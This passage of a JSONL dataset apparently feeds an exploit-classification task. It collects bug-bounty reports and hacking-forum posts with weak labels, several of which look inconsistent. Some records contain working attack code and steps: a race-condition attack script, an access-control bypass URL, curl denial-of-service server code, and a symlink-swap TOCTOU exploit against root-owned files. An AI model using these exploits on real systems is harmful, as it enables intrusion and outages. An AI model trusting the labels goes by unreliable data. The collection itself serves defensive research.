response \n4.Now otp is exposing in the response.\n5.Account take over is happening.\n\n## Impact\n\nAny attacker can login into user account with his/her otp verification which is a high impact of this website.sensitive data is exposing here", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ce5c881d9112f554f6f2", "text": "I am looking for people who can hide their ass and work with them. I see beautiful ideas here. Good learning from you guys. Always buy used devices. Trust me it helps. Always use an RDP regardless your layers of protection.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-07-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b30fb4e8bfc900c92822", "text": "Thank you! plus: we are in the machine already, so an exec is enough tho", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-06-24", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d87cf416ef610a06c10a", "text": "There is a free tool online called Email-Extractor Email Extractor - Online tool for extracting any email address (email-checker.net) That can extract email addresses from the text content. I hope you found this helpful", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-03-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "6eee168f6b509ba718e3", "text": "[Privilege Escalation] OpenSSL engines can be used to bypass and/or disable the permission model\n\n**Summary:** Node.js 20 allows loading arbitrary OpenSSL engines even when the permission model is enabled, which can bypass and/or disable the permission model.\n\n**Description:** The permission model implementation permits loading arbitrary native code, e.g., through `crypto.setEngine()`, even when native addons are disallowed, which is the default configuration. Not only can this code bypass the permission system, it can also disable the permission system entirely, effectively allowing JavaScript code to escalate its own privileges.\n\n## Steps To Reproduce:\n\n 1. Enable the permission model.\n 2. Call, for example, `crypto.setEngine()` with a compatible OpenSSL engine.\n 3. Arbitrary code execution occurs, unaffected by the permission model.\n\n## Impact\n\nThe permission model is supposed to restrict the capabilities of running code. However, exploiting this vulnerability allows an attacker to easily bypass the permission model entirely. The OpenSSL engine can, for example, disable the permission model in the host process, and subsequently executed JavaScript code will be unaffected by the previously enabled permission model. This allows running JavaScript code to effectively elevate its own permissions.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "cacf44032b3acfdee83b", "text": "[Improper Access Control - Generic] Adobe ColdFusion Access Control Bypass - CVE-2023-38205\n\n**Description:**\nHi team,\nThe subdomain https://████ is with adobe ColdFusion vulnerable with CVE-2023-38205.\nThis vulnerability is a bypass path created for CVE-2023-29298.\n\n## References\n\nhttps://www.rapid7.com/blog/post/2023/07/19/cve-2023-38205-adobe-coldfusion-access-control-bypass-fixed/\n\n## Impact\n\nIf an attacker accesses a URL path of /hax/..CFIDE/wizards/common/utils.cfc the access control can be bypassed and the expected endpoint can still be reached, even though it is not a valid URL path .\n\n## System Host(s)\n█████████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2023-38205\n\n## Steps to Reproduce\n1. Go to: https://█████████/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx\n2. See the remote method call wizardHash on the/CFIDE/wizards/common/utils.cfc endpoint.\n\n## Suggested Mitigation/Remediation Actions", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2023-38205", "CVE-2023-29298"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-12-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3f9ce30d1b3f1f5b39eb", "text": "[Uncontrolled Resource Consumption] DoS via Playbook\n\n## Summary:\nA normal user can create a playbook, that has some attributes like the `run_summary_template`, `retrospective_template` and `description`,that don't have any size check or validation, which allows an attacker to set an unlimited number of characters as their values.\n\nIn a production environment is possible to set up to 50MB of data, due to the default nginx configuration, as the `run_summary_template` value. The creation of the playbook for itself is not sufficient to trigger an DoS attack in the application, but once this playbook is executed(run) the server starts to consume a large amount of computing resources, which causes to the server to stop responding to users requests and ultimately leads to server crash.\n\nThis attack is even worst because after the application is restarted, its not possible to the user who created the playbook run to finish its execution via the Web Portal, because both the channel created by the playbook run, and the run dedicated management page, don't properly load, showing only a blank screen.\n\n## Steps To Reproduce:\n1. Log in as a normal user in the platform.\n2. Grab the user `MMAUTHTOKEN` authentication token.\n3. Generate the playbook payload, that contains 50000000(50MB) characters as the `run_summary_template` attribute value. Use F1893243\n4. Send the following `POST` request to the `plugins/playbooks/api/v0/playbooks` API endpoint:\n```bash\ncurl -X POST \"http:///plugins/playbooks/api/v0/playbooks\" -H 'Content-Type: application/json' -d @payload --cookie \"MMAUTHTOKEN=\" -H \"X-CSRF-TOKEN: \"\n```\n5. Go to the playbooks page, and click on the newly created playbook.\n6. Click in the \"Run\" button and then set an name for the run.\n7. After the run is initiated, the server will start to consume an abnormal quantity of computing resources, and crashes after some seconds.\n8. The application becomes unavailable for all its users.\n\n## Supporting Material/References:\n\n * PoC Video\n{F1893242}\n\n## Impact\n\nA user can cause a full denial of service attack in the application server, making the application server unavailable to all its users.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "cd8f34838704a4cb369e", "text": "Is it possible for the rootkit to self protect and report custom values for /proc/sys/kernel/tainted?", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hacker_exploits", "forum_id": "zerosec", "timestamp": "2022-07-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "10d669c1192451be6249", "text": "Can only agree on the explanation - this particular module look like it skipped the qality control. Your comments made it more clear and easy after but the wording of the assessment is ****", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-11-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1b7c325007d7b67b8cfa", "text": "[Business Logic Errors] Race condition on action: Invite members to a team\n\n## Summary:\nHello there,\n\nI've found a race condition vulnerability which allows the invitation of the same member multiple times to a single team via the dashboard.\n\n## Tools needed:\n * Burp Suite community edition with the extension Turbo Intruder.\nThis is the way I adopted to detect such vulnerability, there is also other ways.\n\n## Steps to reproduce:\n\n 1. Login to an account on omise.co.\n 1. Invite a member for testing \n 1. Intercept the main request to the endpoint /team/memberships using the method POST. Modify the HTTP/1.1 protocol for the communication and add `x-request: %s` for Turbo intruder extension. \n```\nPOST /team/memberships HTTP/2\nHost: dashboard.omise.co\nCookie: _gcl_au=1.1.800828746.1627664641; _fbp=fb.1.1627664641735.336224278; _ga=GA1.2.327762462.1627664642; _gid=GA1.2.1231473711.1627664642; __hstc=21908964.e6cfeebc3384c1d9daed7b052f944f26.1627664645060.1627664645060.1627664645060.1; hubspotutk=e6cfeebc3384c1d9daed7b052f944f26; __hssrc=1; locale=en; _omisegateway_session=\nContent-Length: 271\nCache-Control: max-age=0\nSec-Ch-Ua: \"Chromium\";v=\"91\", \" Not;A Brand\";v=\"99\"\nSec-Ch-Ua-Mobile: ?0\nUpgrade-Insecure-Requests: 1\nOrigin: https://dashboard.omise.co\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nReferer: https://dashboard.omise.co/\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nx-request: %s\nConnection: close\n\nauthenticity_token=email=&membership%5Badmin%5D=0&membership%5Badmin%5D=1&membership%5Btechnical%5D=0&membership%5Btechnical%5D=1&commit=Send+invitation\n```\n\n 1. Send the modified intercepted request with the invited member to Turbo intruder, and write the following attack code :\n```\ndef queueRequests(target, wordlists):\n engine = RequestEngine(endpoint=target.endpoint,\n concurrentConnections=30,\n requestsPerConnection=100,\n pipeline=False\n )\n\n # the 'gate' argument blocks the final byte of each request until openGate is invoked\n for i in range(30):\n engine.queue(target.req, target.baseInput, gate='race1')\n\n # wait until every 'race1' tagged request is ready\n # then send the final byte of each request\n # (this method is non-blocking, just like queue)\n engine.openGate('race1')\n\n engine.complete(timeout=60)\n\ndef handleResponse(req, interesting):\n table.add(req)\n```\n\n 1. Start the Turbo intruder attack. The results are captured in the following screenshots: \n{F1395233} \nAs you can see there is multiple `200 OK` which means a race condition vulnerability happened.\n\n 1. Check the list of invited members to the team. In my case, I used in this attack the invited member : `sim4n6+4@gmail.com`. As you can see the list of invited members to the team is duplicate many times. \n{F1395239}\n\nHowever, when the invited user is already invited. You get the following error message :\n{F1395241}\n\n1. As consequence of the attack, the same email got invited and received multiple emails as can be seen in the following email:\n {F1395246}\n\n 1. By the way, the bug persists even if the invited member accept the invitation. More invitations will remain in the list of the invited members of the team which is undesirable by design. \n\nIf you need any further details, please let me know.\nRegards.\n\n## Impact\n\nRace Condition vulnerability allows the invitation of the same user multiple times.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "42f80635802b3f4074a7", "text": "[Insufficient Session Expiration] Can use the Reddit android app as usual even though revoking the access of it from reddit.com\n\n## Summary:\nHi Team,\n\nFor the last 4 days, I kept testing reddit web. That time, I revoked app access from the old.reddit.com and i checked my app and as expected i was not able to use the account in my app. \n\nAfter 2 days I was checking the chat invites feature on the web and after some time I turned on the internet on my mobile and got a Reddit \"invitation accept\" notification. I clicked on that and I was surprised that I was able to use the previously revoked user account again in the Reddit app.\n\nAfter I tried to reproduce the scenario again. I thought the revoked account get access again after clicking on the app \"chat invite\" notification. \n- I again revoked the app access from the old.reddit.com\n- I sent a chat invitation link to another test account and replied with the test account so that I get a \"chat accept\" notification in the mobile\n- After several tries from several test accounts, Finally, I received the \"chat accept\" invitation, only one time on the mobile (Note: this is also an issue)\n- I clicked on the notification and I was not able to access anything in the app (it was showing some error)\n- I tried to reproduce the issue again, I don't know the reason But this time I was not able to view the chat invite links from any accounts. (it was showing some error)\n- It took my whole day and I stopped testing.\n\nThe next day again I got a post notification on my mobile. I clicked on that and again I see that the app was working as usual with a previous logged-in user!!!\n\nFinally, I came to the conclusion that whenever we revoke the app access, it works fine. But if you check the app approximately after 20+ hours you can reuse the previously logged-in account again.\n\n## Steps To Reproduce:\n 1. log in to your account from both the android mobile app and from the web(reddit.com or old.reddit.com)\n 2. On the Reddit web go to https://www.reddit.com/account-activity \n 3. Navigate to the \"Apps you have authorized\" section\n 4. Find \"Reddit on Android\" click the revoke access and confirm\n 5. Now open the Reddit app where you have logged in step 1\n 6. You are no more able to access any info about the user and it will show errors like \"Let's try that again\" or \"uh oh something went wrong but we're not sure what\"\n 7. Open the app approximately after 20+ hours and see that you can reuse the previously logged-in account without any issue.\n\n## Supporting Material/References:\nI see that I got the latest app update and trying to reproduce the issue again on the latest version i.e 2022.25.1 I will update you on it again. I assume previously my Reddit app version was 2022.25.0 or 2022.24.1\nDevice and version info{F1814768}\nThe account/username used for testing is: sateeshn_1\n\n## Impact\n\nUnauthorized access to account even though revoking the access.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7c8b2f665714663f188e", "text": "[Information Exposure Through Debug Information] Information exposure in in guzzlehttp/guzzle (https://github.com/nextcloud/3rdparty/tree/master/guzzlehttp/guzzle)\n\n## Summary:\n\nAffected versions of this package are vulnerable to Information Exposure which fails to strip the Authorization header on HTTP downgrade, this depency is out of date and it can leat to still authorization header.\n## Steps To Reproduce:\n\n(https://github.com/nextcloud/3rdparty/tree/master/guzzlehttp/guzzle)\n Introduced through: guzzlehttp/guzzle@7.4.0, aws/aws-sdk-php@3.184.6, php-http/guzzle7-adapter@1.0.0, php-opencloud/openstack@3.1.0, microsoft/azure-storage-blob@1.5.2\n From: guzzlehttp/guzzle@7.4.0\n From: aws/aws-sdk-php@3.184.6 > guzzlehttp/guzzle@7.4.0\n From: php-http/guzzle7-adapter@1.0.0 > guzzlehttp/guzzle@7.4.0\n\n##Fix:\nYou can update to 7.4.4, 6.5.7 to fix this information exposure.\n\n## Impact\n\nAffected versions of this package are vulnerable to Information Exposure which fails to strip the Authorization header on HTTP downgrade.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1aebf0096a817ea5e020", "text": "[Information Exposure Through an Error Message] Authenticated but unauthorized users may enumerate Application names via the API\n\nAll versions of Argo CD starting with v0.5.0 are vulnerable to an information disclosure bug allowing unauthorized users to enumerate application names by inspecting API error messages. \n\nSTEPS:\n1. Login argocd with a user who has not application module's priviledge.\n2. The user request 'api/v1/application/**/logs' restful api to download a log file.\n3. The log file's content lead a information disclosure bug, which allowing unauthorized users to enumerate application names by inspecting API error messages. The error messages like 'error gettingg applicaiton by name: ** not found'.\n\n## Impact\n\nAn attacker could use the discovered application names as the starting point of another attack. For example, the attacker might use their knowledge of an application name to convince an administrator to grant higher privileges (social engineering).", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b1009a53c1bcc1c82236", "text": "Excellent work here @0xf00 , I’m always up for such kind of articles. Great research!!Only the best!", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hacker_exploits", "forum_id": "zerosec", "timestamp": "2022-08-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "fec28381822066a2d482", "text": "Would someone explain why my dnsenum keeps timing out: app.inlanefreight.htb. NS record query failed: query timed out running this: sudo dnsenum --dnsserver 10.129.18.15 --enum -p 0 -s 0 -o subdomains.txt -f /home/ethhack/Seclists/Discovery/DNS/fierce-hostlist.txt app.inlanefreight.htb. dnsenum VERSION:1.2.6", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-08-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3507b3b1cc46418f8d19", "text": "[Unknown] HTML Injection in E-mail Not Resolved ()\n\n## Summary\nOn this report \" https://hackerone.com/reports/1536899 \" You closed the report and changed the status to Resolved.\nBut it's Not Resolved The Bug It's Still there \n\n## Steps To Reproduce\n\n 1.Please register at https://www.acronis.com/en-us/products/cyber-protect/trial/#registration with the victim's email.\n 2. Inject \"First Name\" field with HTML tags, for example: \"/>login.\n 3.Check the email inbox, HTML tags will be executed. \"Your Acronis Cyber Protect trial starts today!\" \n\nProof of Concept: \n F1774045\n\n## Impact\n\nHTML injection into emails is dangerous!\n\n* Your users are at risk when a hacker is able to take control of the emails that your applications send, but what's especially dangerous is that the emails will be coming from your company email address.\n\n* When a malicious email comes from your company email, it looks a lot more legitimate.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3335fd3dab525d3a68c7", "text": "Can someone give a hint on elasticity? The web api seem to accept some chars, e.g. \\ or quotes, but I don’t seem to be able to do anything with it. Internal ports 9200/9300 not responding. Not sure what to do at this point.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-07-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0044b02c89328fd84ab0", "text": "[Uncontrolled Resource Consumption] node.js process aborts when processing x509 certs with invalid public key information\n\n**Summary:** \nThe code for the CreateAsymmetric method in src/crypto/crypto_keys.cc: assumes that the certificate includes a valid public key. \nHowever, malicious actors could construct x509 certificates that can break this assumption. \n\n**Description:** \n\nWhen we run the attached reproducer, the node process aborts with the following message: \n\n /usr/local/bin/node loadcert_poc.js\nv18.14.2\nvalid:Feb 21 23:59:59 2015 GMT\n/usr/local/bin/node[392068]: ../src/crypto/crypto_keys.cc:869:static std::shared_ptr node::crypto::KeyObjectData::CreateAsymmetric(node::crypto::KeyType, const node::crypto::ManagedEVPPKey&): Assertion `pkey' failed.\n 1: 0xb7b3f0 node::Abort() [/usr/local/bin/node]\n 2: 0xb7b46e [/usr/local/bin/node]\n 3: 0xd11002 node::crypto::KeyObjectData::CreateAsymmetric(node::crypto::KeyType, node::crypto::ManagedEVPPKey const&) [/usr/local/bin/node]\n 4: 0xd29626 node::crypto::X509Certificate::PublicKey(v8::FunctionCallbackInfo const&) [/usr/local/bin/node]\n 5: 0xdc12a0 [/usr/local/bin/node]\n 6: 0xdc27df v8::internal::Builtin_HandleApiCall(int, unsigned long*, v8::internal::Isolate*) [/usr/local/bin/node]\n 7: 0x1700679 [/usr/local/bin/node]\nAborted\n\nSame outcome with 19.7.0\n\nThe CHECK(pkey) in method CreateAsymmetric [1] could be made more aware of the invalid state of the provided x509 certificate to gracefully handle the situation. \n\nstd::shared_ptr KeyObjectData::CreateAsymmetric(\n KeyType key_type,\n const ManagedEVPPKey& pkey) {\n ===> CHECK(pkey);\n return std::shared_ptr(new KeyObjectData(key_type, pkey));\n}\n\n## Steps To Reproduce:\n/usr/local/bin/node loadcert_poc.js \nv19.7.0\n[1]\nvalid:Feb 21 23:59:59 2015 GMT\n/usr/local/bin/node[4119272]: ../src/crypto/crypto_keys.cc:869:static std::shared_ptr node::crypto::KeyObjectData::CreateAsymmetric(node::crypto::KeyType, const node::crypto::ManagedEVPPKey&): Assertion `pkey' failed.\n[..]\nAborted\n\n## Impact: \n\nThere are various use cases where an application may want to access the public key info of a client-provided certificate. Developer may assume that the crypto code is safe to feed with arbitrary x509 material. \n\n## Supporting Material/References:\n\n[1] https://github.com/nodejs/node/blob/5fad0b93667ffc6e4def52996b9529ac99b26319/src/crypto/crypto_keys.cc#L881\n\n## Impact\n\nThe attacker could force interruptions of application processing, as the process terminates when accessing public key info of provided certificates from user code. The current context of the users will be gone, and that will cause a DoS scenario, downtime, reputation and potential revenue loss.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-07-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "aed5ab7816f6545c9cd4", "text": "[Uncontrolled Resource Consumption] Slowvote and Countdown can cause Denial of Service due to recursive inclusion\n\nSimilar to #85011, if you edit a Slowvote or Countdown object and include its own object ID in the description, then it will recursively include and prevent the page from loading.\n\nmongoose\n\n## Impact\n\nDenial of Service. You can include the Slowvote or Countdown object on any other object to also prevent it from loading. If it is included in the feed, you could also prevent the home page from loading.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7e2e23869831b2924457", "text": "[Unknown] Self-XSS due to image URL can be eploited via XSSJacking techniques in review email\n\n## Summary:\nGood day team,\n\nI found a self-xss due to the image url of recommendations in your reviewer profile that can be exploited via XSSJacking techniques. \n\nThis one was honestly pretty tricky, since unlike the rest of the Judge.me App that whitelisted `*.myshopify.com` in the CSP this one has a set `X-Frame-Options: SAMEORIGIN` meaning unlike the rest of my XSS reports I can use my Shopify store's frontent. Luckily though I managed to find a place that allows me to load iframes, namely the full email preview of review requests.\n\n## Steps To Reproduce:\n\n 1. Login to your 'reviewer' account in Judge.me\n\n 1. Add a new recommendation for your public profile: `https://judge.me/[ID]?subtab=recommendations&tab=public_profile` -> Add recommendation\n\n 1. Go back to the recommendation list, click the pencil icon in the image and insert this payload to trigger the Self-XSS: `https://secure.gravatar.com/avatar/█████████.png?;'onload=alert(document.domain)>`\n\n 1. Now to exploit this, login to your Shopify account and open the Judge.me app\n\n 1. Click 'Request' -> 'Email Templates' and edit the existing email template\n\n 1. In the 'text block', add a link and insert this payload as the display text and url (make sure to edit the ID to targeted reviewer's ID): `https://\n```\nthis XSS bypasses the current CSP on Gitlab.com (tried it with an Ultimate trial and inviting a user without a trial to the project)\n\nAs I got the impression that all XSS are treated equal when reporting a similar issue, I have not made any deeper analysis of the reason for this firing. Thought I just report it right away. Please reach back to me if you need me to research the impact deeper! As an example, it does not fire when one \"edits\" a MR which is a bit odd...\n\n### Steps to reproduce\n\n1. Create two user accounts, `attacker_user` and `victim_user` (`attacker_user` must have at least premium features enabled)\n2. Log in as `attacker_user`\n3. Create a project `xss_project` by going to https://gitlab.com/projects/new#blank_project\n4. Go to projects settings on https://gitlab.com/attacker_user/xss_project/edit and scroll down to and expand \"Merge request approvals\"\n\n{F1450906}\n\n5. Click \"Add approval rule\"\n6. Put the payload as the name, If on Gitlab.com use\n```\n\n```\nif this is tested on a server without CSP feel free to use the payload\n```\n\n```\n7. Search for and select `attacker_user` as approver and click create rule.\n\n{F1450905}\n\n8. Invite `victim_user` to the project as `Developer` on https://gitlab.com/attacker_user/xss_project/-/project_members\n9. Log out and log back in as `victim_user`\n10. Go to https://██████████/user_01/pub/-/branches/new and create a branch `new`\n11. Directly click on \"Create merge request\" (which will appear on the screen)\n\n{F1450903}\n\n12. Click on the dropdown at \"Reviewers\"\n13. Payload will trigger\n\n{F1450904}\n\n\n### Impact\n\nStored XSS with CSP bypass. Full Javascript functionality without restrictions, so everything from stealing data to generating and exfiltrating access tokens.\n\n### Examples\n\nIf you access my private project at Gitlab.com (https://gitlab.com/ultimate-joaxcar-test3/xss) as an admin, you should be able to create an MR and trigger payload. (Just an alert box)\n\n### What is the current *bug* behavior?\n\nApprover rule name is injected in the user information without proper sanitization.\n\n### What is the expected *correct* behavior?\n\nThe name should be sanitized\n\n\n### Output of checks\n\nThis bug happens on GitLab.com\n\n## Impact\n\nStored XSS with CSP bypass. Full Javascript functionality without restrictions, so everything from stealing data to generating and exfiltrating access tokens.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-31", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "371edeb99836aa5c6901", "text": "[Allocation of Resources Without Limits or Throttling] CVE-2023-38039: HTTP header allocation DOS\n\nIt was found that curl does not currently limit the amount of HTTP headers to be received leading to a potential DOS for the users.\nIf an attacker sets up a malicious HTTP server that continuously sends new headers and keeps the socket open, curl will continuously listen on the socket and parse new received headers. This leads to the user's machine allocating more and more resources until the system is eventually exhausted.\nFrom research the vulnerable function seems to be located at https://github.com/curl/curl/blob/master/lib/transfer.c#L420.\nFor comparison, modern browsers abort the connection once they reach a threshold.\nOne potential fix to not affect functionality too much would be to set an arbitrary limit to the amount of headers to receive, which I believe is the solution adapted by most modern browsers to solve this issue.\n\n## Screenshot \n{F2513231}\nMy excuses for the French in screenshot (I'm sorting programs by RAM usage, and the top one is of course the windows terminal from which I executed curl). On there you can see my user terminal (windows) launching `curl 127.0.0.1:80` to the left, on the right we see the attacker's server (attaching full source code to this report). Throughout testing memory usage kept increasing alarmingly high.\n\n## Malicious server code extract:\n```\nvoid send_payload(int fd)\n{\n\tmemset(speedup, 'a', sizeof(speedup));\n\t//first we send the start of a valid HTTP request with status line and a few headers\n send(fd, validreq, sizeof(validreq), MSG_MORE);\t\n\twhile (1337)\n\t{\n\t\t//this is used to speed up the dos process sending extra bytes\n\t\tsend(fd, speedup, sizeof(speedup), MSG_MORE );\n\t\t//now we're spamming the curl client with the header \"a:b\" then telling it there's more to come !\n\t\tsend(fd, \"a:b\\x0d\\x0a\", 5, MSG_MORE );\n\t}\n}\n```\n\n## Steps To Reproduce:\n 1. Compile exploit.c and execute the server binary.\nNote: depending on your system, feel free to play with the `ATTACK_SPEED` define of the code, to speed up testing.\n 2. Open up another terminal and as the victim try `curl 127.0.0.1:80`\n 3. Observe system metrics.\n\n## Impact\n\nDOS/overloading of user's system through malicious HTTP server interaction with curl's header parsing.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2023-38039"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-09-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9befa5492558ef189aec", "text": "greetings people, help me please what password word-list I should use? there is tons of it", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-02-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "53b6ef2f9d902b1294a5", "text": "[Improper Access Control - Generic] Disavowed an email without any authentication\n\nHii team, I hope you are doing well.\nWhile conducting my research I found that there are some URLs that leads to disavowing some account without any authentication.\nIt allows unauthorized users to disavow or dissociate an email address from an account without requiring proper authentication.\n\nSteps to reproduce:\n1. Put this command into your terminal:\nwaybackurls liberapay.com | grep disavow\n\nThis command will collect all the URLs related to liberapay.com and search for the specific keyword \"disavow\".\n\nIf you open one of the URLs you'll disavow an account without proper authorization.\n\n## Impact\n\nUnauthorized Account Access: Attackers can disassociate a legitimate email address from an account, potentially preventing the real owner from accessing their account.\n\nPlease let me know if you need more info.\n\nKind Regards\n@sameersec", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-07-31", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0e64cd19f53b63748fa5", "text": "Hi all ! I started JET Fortress and got 3 first flag. Now im stuck for Bypass Authentication. Im looking for someone who want to help me please.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-01-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3095b69f91d2d8255da6", "text": "[Time-of-check Time-of-use (TOCTOU) Race Condition] [curl] CVE-2023-32001: fopen race condition\n\nHello, I'm reporting for CVE-2023-32001 on curl which was resolved in last Wednesday's curl release.\n\n### Vulnerability explanation: \nAs we can see in the following curl code (line 59-61 https://github.com/curl/curl/blob/fb802b521af997230b65174a559f5c419520e142/lib/fopen.c ): \n```C\n if(stat(filename, &sb) == -1 || !S_ISREG(sb.st_mode)) {\n /* a non-regular file, fallback to direct fopen() */\n *fh = fopen(filename, FOPEN_WRITETEXT);\n...\n}\n...\n```\nThere is a race condition between the moment \"stat(filename, &sb)\" is executed and the moment \" fopen(filename, FOPEN_WRITETEXT);\" is executed.\nThis leads to undesirable behavior such as an attacker tricking a privileged user to overwrite protected files, or since this function (Curl_fopen) is also used for storing cookies an attacker could trick another user to send those cookies that might be very sensible to a file fully owned and controlled by the attacker.\n\n###POC/Steps to reproduce:\nBefore we start, I will be using a little program called \"rename\". Which simply swaps atomically the names of two files to be able to showcase this race condition. Here is its code :\n```\n#include \n#include \n#include \n#include \n#include \n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n\n// source https://github.com/sroettger/35c3ctf_chals/blob/master/logrotate/exploit/rename.c\nint main(int argc, char *argv[]) {\n while (1) {\n syscall(SYS_renameat2, AT_FDCWD, argv[1], AT_FDCWD, argv[2], RENAME_EXCHANGE);\n }\n return 0;\n}\n```\n\nOpen two terminals, with two different users. One will be the attacker terminal and the other the victim. \nIn both POCs, the victim will want to execute a command such as \"curl --cookie-jar a google.com\" thinking the file \"a\" doesn't exist.\n\n###A) Exploiting this vulnerability to trick a user to overwrite a file they own:\n\nAssume the current directory of both attacker(selmelc) and victim (root) looks like this\n```SHELL\nlrwxrwxrwx 1 selmelc selmelc 4 Jun 27 07:11 a -> flag\ndrwxrwxrwx 2 selmelc selmelc 4096 Jun 27 07:11 b\n-rw-r--r-- 1 root root 6 Jun 27 07:05 flag\n-rwxr-x--- 1 selmelc selmelc 16608 Jun 27 07:04 rename\n```\nThe attacker executes ./rename a b, which will not stop to swap the name of the directory \"b\" and the symlink \"a\". \n\nThe victim executes their command \"curl --cookie-jar a google.com\".\nThe race condition is successfully exploited if in the vulnerable code the stat identifies the file \"a\" as a directory and then the \"fopen\" opens the symlink that points to the file \"flag\".\nIf that happened then the results looks like this :\n```\n...\n-rw-r--r-- 1 root root 131 Jun 27 07:13 flag\n...\nroot@deb:/home/selmelc/Documents# cat flag\n# Netscape HTTP Cookie File\n# https://curl.se/docs/http-cookies.html\n# This file was generated by libcurl! Edit at your own risk.\n```\nAdditional note: \nYou might think \"well that's just how symlinks work\"... To clarify on that, by default if the victim was executing \"curl --cookie-jar a google.com\" without the attacker exploiting the vuln. a different behavior would occur ; the file \"a\" would be erased (no more symlink) and overwritten as a regular file containing the cookie data. This happens because the stat function follows symbolic links therefore in that scenario we would not enter the vulnerable condition which leads to the race condition.\n\n###B) Exploiting this vulnerability to steal the victim's cookies and hide it from them:\n\nAs this uses the same logic as the previous exploit for this vuln. Repeat same steps except this time we want the \"flag\" file to be owned by the attacker as following:\n```\nlrwxrwxrwx 1 selmelc selmelc 4 Jun 27 08:42 a -> flag\ndrwxrwxrwx 2 selmelc selmelc 4096 Jun 27 08:41 